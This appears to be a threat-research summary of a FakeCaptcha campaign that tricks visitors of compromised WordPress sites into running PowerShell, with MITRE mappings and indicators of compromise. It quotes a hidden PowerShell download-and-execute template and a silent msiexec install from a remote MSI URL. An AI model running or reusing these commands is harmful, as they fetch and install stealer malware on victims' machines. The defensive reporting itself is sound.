Threat Research

HuluCaptcha CAPTCHA Deploys Malware

Securonix
HuluCaptcha CAPTCHA Deploys Malware

This article analyzes a sophisticated FakeCaptcha malware campaign that tricks victims into executing malicious PowerShell commands via fake Cloudflare CAPTCHA pages, involving multiple layered obfuscation techniques and affiliate tracking capabilities. It also details the investigation of compromised WordPress sites including the deployment of persistent, hidden backdoor plugins and expands on the threat infrastructure and indicators to assist in detection and mitigation. #FakeCaptcha #LummaStealer #WordPressBackdoor #AurotunStealer #Donutloader

Keypoints

  • The FakeCaptcha attack abuses legitimate CAPTCHA trust by redirecting victims from compromised websites to fake Cloudflare CAPTCHA pages instructing them to run malicious PowerShell commands via Windows Run, leading to malware infection.
  • The attack framework includes advanced victim tracking through multiple POST logs, detection of Windows key combinations, and a mechanism to prevent repeated infection via localStorage flags.
  • An automated PowerShell payload generator dynamically constructs obfuscated PowerShell commands with randomly selected domains from a hardcoded list to evade detection, although this feature was not actively used in observed samples.
  • The threat actor deployed two sophisticated and persistent WordPress backdoor plugins on compromised servers that create hidden administrator accounts (backupsystems and adminbackup) fully concealed from WordPress interfaces, REST API, and user queries.
  • The attacker infrastructure includes a broad array of domains and URLs related to fake Cloudflare pages, payload delivery, and affiliate tracking, facilitating broad scale infection and monetization strategies.
  • Investigation revealed use of Lumma Stealer, Aurotun Stealer, and Donutloader malware families delivered through this method, indicating a multi-malware campaign.
  • Several legitimate high-value organization websites were compromised, highlighting the risk of sensitive data exposure and the evolving threat landscape of FakeCaptcha frameworks.

MITRE Techniques

  • [T1059.001] PowerShell – Used to execute remote code by instructing victims to run obfuscated PowerShell commands downloaded from attacker-controlled domains via Invoke-WebRequest and Invoke-Expression (“…powershell -w hidden -Command “& { $url=(…); iex (iwr -Uri $url -UseBasicParsing) }”…”).
  • [T1078] Valid Accounts – Backdoor WordPress plugins create hidden administrator accounts (‘backupsystems’ and ‘adminbackup’) giving persistent access.
  • [T1566.001] Phishing: Spearphishing Link – Victims are lured to compromised legitimate websites that redirect them via fake CAPTCHA pages.
  • [T1190] Exploit Public-Facing Application – Compromised WordPress sites serve malicious JavaScript leading to infection (injection into “main.min.js”).
  • [T1112] Modify Registry – Indirectly inferred by use of PowerShell commands that may modify system settings when executing payloads.
  • [T1222] File and Directory Permissions Modification – Backdoor plugins alter system files such as themes’ functions.php and plugin files to maintain persistence.
  • [T1027] Obfuscated Files or Information – PowerShell payload and URL obfuscation through splitting and concatenation tactics to evade detection.
  • [T1083] File and Directory Discovery – Backdoor plugins query WordPress database and settings to hide malicious administrator users from user lists and REST API.

Indicators of Compromise

  • [Domains] Related to attack infrastructure and payload delivery – analytiwave.com, goclouder.com, amoliera.com, security.flargyard.com, sharecloud.click.
  • [Domains] Fake Cloudflare phishing pages – security.claufgaurd.com, security.clodaflare.com, security.flargyard.com, security.cloudstwr.com, security.flaiegaurd.com.
  • [IP Addresses and C2] Payload command and control servers – 91.200.14.69:7712, uplink-routes.asiad-nodes.shop.
  • [File Names] WordPress backdoors – core-handler/core-handler.php (hash: c83d1d9b7fc84bf5a5feb320795d4e82615f82ad1a1520148ba9169d13272a4c), core-handler2/core-handler.php (hash: 1f3f3d940375fb237e3c9fd3e7534edb4a9232a8747d5da039f03558ccff8a43).
  • [File Names] JavaScript injection in compromised theme – /wp-content/themes/Dummy/assets/js/main.min.js.
  • [Payload Hashes] Malware samples associated with Aurotun Stealer and Donutloader – c078b10c298528c6a50a776519ef2be6819c43642aa82a88784d85e35d6b8298.
  • [Commands] Malicious PowerShell commands template using Invoke-WebRequest and Invoke-Expression with obfuscated URLs, and MSI execution commands such as msiexec.exe /i hxxps://fopelas.com/flare.msi /qn.

Read more: https://gi7w0rm.medium.com/hulucaptcha-an-example-of-a-fakecaptcha-framework-9f50eeeb2e6d